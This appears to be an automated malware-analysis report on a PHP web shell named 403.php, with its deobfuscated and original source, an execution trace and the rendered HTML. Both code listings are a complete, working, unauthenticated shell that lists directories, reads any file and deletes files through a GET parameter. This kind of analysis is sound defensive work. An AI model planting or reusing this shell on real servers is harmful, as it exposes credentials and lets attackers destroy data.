PHP Malware Analysis

403.php

md5: 1a375e532de9f6efe8ae5a9d68a4d5d4



Attributes

Input


Deobfuscated PHP code

<?php

// Starting directory for the listing, plus the two link styles the
// listing uses (one for regular files, one for everything else).
$root   = '/var/www/html';
$style1 = 'color:#000;';
$style2 = 'color:#00a;font-weight:bold;';
/**
 * Return the parent of a directory path that ends in a trailing '/'.
 *
 * The trailing separator is dropped first, then the string is cut back to
 * the last remaining '/' (which is itself removed). For '/var/www/html/'
 * this yields '/var/www'.
 */
function updir($ADir)
{
    $withoutTrailingSlash = substr($ADir, 0, strlen($ADir) - 1);
    $lastSeparator = strrpos($withoutTrailingSlash, '/');
    return substr($withoutTrailingSlash, 0, $lastSeparator);
}
// Request handling. Every branch below uses $_GET['file'] as a raw
// filesystem path: there is no normalisation, no check that it stays under
// $root, and no authentication anywhere in this script. In access logs the
// shell shows up as requests to this file carrying a "file" query
// parameter, with "del" added for deletions.
if (isset($_GET['file'])) {
    // ?file=<path>&del=<anything>: the named path is removed and the
    // script stops without producing any output.
    if (isset($_GET['del'])) {
        unlink($_GET['file']);
        die;
    }
    // ?file=<path> naming a regular file: its bytes are returned verbatim
    // as text/plain, so any file readable by the web server user is
    // disclosed (source, configuration, credentials).
    if (is_file($_GET['file'])) {
        header("Content-type: text/plain");
        readfile($_GET['file']);
        return;
    }
    // Anything else is treated as a directory to list.
    $path = $_GET['file'] . '/';
} else {
    // No parameter: list the starting directory.
    $path = $root . '/';
}
// Directory listing. $root, $path and each $file name are written into the
// HTML without escaping, so the rendered page is itself untrusted output.
echo $root . '<br>';
echo $path . '<hr>';
echo '<a href="?file=' . updir($path) . '">..</a><br />';
$p = $path . '*';
foreach (glob($p) as $file) {
    // One row per entry: last four octal digits of the mode, a link styled
    // with $style1 for regular files and $style2 otherwise, size in bytes
    // and the modification time.
    echo '<span style="font-size:11px;color:#777;">' . substr(sprintf('%o', fileperms($file)), -4) . '</span> <a style="' . (is_file($file) ? $style1 : $style2) . '" href="?file=' . $file . '">' . basename($file) . '</a> - <span style="font-size:11px;color:#777;">' . filesize($file) . ' - ' . date("F d Y H:i:s", filemtime($file)) . '</span><br />';
}
echo "<hr>";

Execution traces

data/traces/1a375e532de9f6efe8ae5a9d68a4d5d4_trace-1676252131.8615.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 23:35:57.759307]
1	0	1	0.000135	393512
1	3	0	0.000236	406264	{main}	1		/var/www/html/uploads/403.php	0	0
1		A						/var/www/html/uploads/403.php	2	$root = '/var/www/html/uploads'
1		A						/var/www/html/uploads/403.php	3	$style1 = 'color:#000;'
1		A						/var/www/html/uploads/403.php	4	$style2 = 'color:#00a;font-weight:bold;'
1		A						/var/www/html/uploads/403.php	27	$path = '/var/www/html/uploads/'
2	4	0	0.000303	406312	updir	1		/var/www/html/uploads/403.php	31	1	'/var/www/html/uploads/'
3	5	0	0.000316	406312	substr	0		/var/www/html/uploads/403.php	7	3	'/var/www/html/uploads/'	0	21
3	5	1	0.000331	406456
3	5	R			'/var/www/html/uploads'
2		A						/var/www/html/uploads/403.php	7	$ADir = '/var/www/html/uploads'
3	6	0	0.000356	406360	strrpos	0		/var/www/html/uploads/403.php	8	2	'/var/www/html/uploads'	'/'
3	6	1	0.000370	406432
3	6	R			13
3	7	0	0.000383	406360	substr	0		/var/www/html/uploads/403.php	8	3	'/var/www/html/uploads'	0	13
3	7	1	0.000395	406496
3	7	R			'/var/www/html'
2		A						/var/www/html/uploads/403.php	8	$ADir = '/var/www/html'
2	4	1	0.000423	406352
2	4	R			'/var/www/html'
1		A						/var/www/html/uploads/403.php	32	$p = '/var/www/html/uploads/*'
2	8	0	0.000450	406360	glob	0		/var/www/html/uploads/403.php	33	1	'/var/www/html/uploads/*'
2	8	1	0.000506	406944
2	8	R			[0 => '/var/www/html/uploads/403.php', 1 => '/var/www/html/uploads/data', 2 => '/var/www/html/uploads/prepend.php']
2	9	0	0.000545	406912	fileperms	0		/var/www/html/uploads/403.php	34	1	'/var/www/html/uploads/403.php'
2	9	1	0.000563	406984
2	9	R			33204
2	10	0	0.000576	406944	sprintf	0		/var/www/html/uploads/403.php	34	2	'%o'	33204
2	10	1	0.000590	407328
2	10	R			'100664'
2	11	0	0.000603	407264	substr	0		/var/www/html/uploads/403.php	34	2	'100664'	-4
2	11	1	0.000615	407360
2	11	R			'0664'
2	12	0	0.000628	407040	is_file	0		/var/www/html/uploads/403.php	34	1	'/var/www/html/uploads/403.php'
2	12	1	0.000641	407080
2	12	R			TRUE
2	13	0	0.000655	407104	basename	0		/var/www/html/uploads/403.php	34	1	'/var/www/html/uploads/403.php'
2	13	1	0.000669	407168
2	13	R			'403.php'
2	14	0	0.000683	407168	filesize	0		/var/www/html/uploads/403.php	34	1	'/var/www/html/uploads/403.php'
2	14	1	0.000696	407208
2	14	R			953
2	15	0	0.000709	407168	filemtime	0		/var/www/html/uploads/403.php	34	1	'/var/www/html/uploads/403.php'
2	15	1	0.000721	407208
2	15	R			1676252131
2	16	0	0.000734	407168	date	0		/var/www/html/uploads/403.php	34	2	'F d Y H:i:s'	1676252131
2	16	1	0.000790	409560
2	16	R			'February 12 2023 20:35:31'
2	17	0	0.000808	409008	fileperms	0		/var/www/html/uploads/403.php	34	1	'/var/www/html/uploads/data'
2	17	1	0.000825	409048
2	17	R			16895
2	18	0	0.000837	409008	sprintf	0		/var/www/html/uploads/403.php	34	2	'%o'	16895
2	18	1	0.000850	409392
2	18	R			'40777'
2	19	0	0.000863	409328	substr	0		/var/www/html/uploads/403.php	34	2	'40777'	-4
2	19	1	0.000875	409424
2	19	R			'0777'
2	20	0	0.000888	409104	is_file	0		/var/www/html/uploads/403.php	34	1	'/var/www/html/uploads/data'
2	20	1	0.000900	409144
2	20	R			FALSE
2	21	0	0.000913	409168	basename	0		/var/www/html/uploads/403.php	34	1	'/var/www/html/uploads/data'
2	21	1	0.000926	409232
2	21	R			'data'
2	22	0	0.000939	409232	filesize	0		/var/www/html/uploads/403.php	34	1	'/var/www/html/uploads/data'
2	22	1	0.000951	409272
2	22	R			4096
2	23	0	0.000964	409232	filemtime	0		/var/www/html/uploads/403.php	34	1	'/var/www/html/uploads/data'
2	23	1	0.000976	409272
2	23	R			1676252131
2	24	0	0.000989	409232	date	0		/var/www/html/uploads/403.php	34	2	'F d Y H:i:s'	1676252131
2	24	1	0.001019	409560
2	24	R			'February 12 2023 20:35:31'
2	25	0	0.001034	409008	fileperms	0		/var/www/html/uploads/403.php	34	1	'/var/www/html/uploads/prepend.php'
2	25	1	0.001049	409056
2	25	R			33261
2	26	0	0.001062	409016	sprintf	0		/var/www/html/uploads/403.php	34	2	'%o'	33261
2	26	1	0.001074	409400
2	26	R			'100755'
2	27	0	0.001086	409336	substr	0		/var/www/html/uploads/403.php	34	2	'100755'	-4
2	27	1	0.001099	409432
2	27	R			'0755'
2	28	0	0.001111	409112	is_file	0		/var/www/html/uploads/403.php	34	1	'/var/www/html/uploads/prepend.php'
2	28	1	0.001124	409152
2	28	R			TRUE
2	29	0	0.001137	409176	basename	0		/var/www/html/uploads/403.php	34	1	'/var/www/html/uploads/prepend.php'
2	29	1	0.001156	409248
2	29	R			'prepend.php'
2	30	0	0.001170	409240	filesize	0		/var/www/html/uploads/403.php	34	1	'/var/www/html/uploads/prepend.php'
2	30	1	0.001183	409280
2	30	R			57
2	31	0	0.001196	409240	filemtime	0		/var/www/html/uploads/403.php	34	1	'/var/www/html/uploads/prepend.php'
2	31	1	0.001208	409280
2	31	R			1676252131
2	32	0	0.001220	409240	date	0		/var/www/html/uploads/403.php	34	2	'F d Y H:i:s'	1676252131
2	32	1	0.001250	409568
2	32	R			'February 12 2023 20:35:31'
1	3	1	0.001267	408528
			0.001292	316112
TRACE END   [2023-02-12 23:35:57.760491]


Generated HTML code

<html><head></head><body>/var/www/html<br>/var/www/html/<hr><a href="?file=/var/www">..</a><br><span style="font-size:11px;color:#777;">0664</span> <a style="color:#000;" href="?file=/var/www/html/403.php">403.php</a> - <span style="font-size:11px;color:#777;">953 - February 12 2023 20:35:25</span><br><span style="font-size:11px;color:#777;">0644</span> <a style="color:#000;" href="?file=/var/www/html/beneri.se_malware_analysis">beneri.se_malware_analysis</a> - <span style="font-size:11px;color:#777;">0 - February 12 2023 20:35:25</span><br><hr></body></html>

Original PHP code

<?php
// Starting directory is wherever this file lives; the two styles mark
// regular files versus everything else in the listing.
$root = __DIR__;
$style1 = 'color:#000;';
$style2 = 'color:#00a;font-weight:bold;';

/**
 * Parent of a directory path that ends with '/': strip the trailing
 * separator, then cut back to (and drop) the last remaining '/'.
 */
function updir($ADir){
	$withoutTrailingSlash = substr($ADir, 0, strlen($ADir)-1);
	$lastSeparator = strrpos($withoutTrailingSlash, '/');
	return substr($withoutTrailingSlash, 0, $lastSeparator);
}

// Request handling: $_GET['file'] is used as a raw filesystem path in every
// branch below, with no normalisation, no confinement to $root and no
// authentication. In access logs this shell appears as requests to this
// file carrying a "file" query parameter, plus "del" for deletions.
if (isset($_GET['file'])) { 

	// ?file=<path>&del=<anything> removes the named path and stops.
	if (isset($_GET['del'])){
		unlink($_GET['file']);
		die;
	}

	// ?file=<path> naming a regular file returns its bytes as text/plain:
	// any file readable by the web server user is disclosed.
	if (is_file($_GET['file'])) {
		header("Content-type: text/plain");
		readfile($_GET['file']);
		return;
	}

	// Otherwise the value is treated as a directory to list.
	$path = $_GET['file'].'/';

} else $path = $root.'/';

// Directory listing. $root, $path and each $file are written into the HTML
// unescaped, so the rendered page is itself untrusted output.
echo($root.'<br>');
echo($path.'<hr>');
echo '<a href="?file='.updir($path).'">..</a><br />';
$p = $path.'*';
foreach (glob($p) as $file) {
	// One row per entry: last four octal digits of the mode, a link styled
	// with $style1 for regular files and $style2 otherwise, size, mtime.
	echo '<span style="font-size:11px;color:#777;">'.substr(sprintf('%o',fileperms($file)),-4).'</span> <a style="'.(is_file($file)?$style1:$style2).'" href="?file='.$file.'">'.basename($file).'</a> - <span style="font-size:11px;color:#777;">'.filesize($file).' - '.date("F d Y H:i:s", filemtime($file)).'</span><br />';
}
echo('<hr>');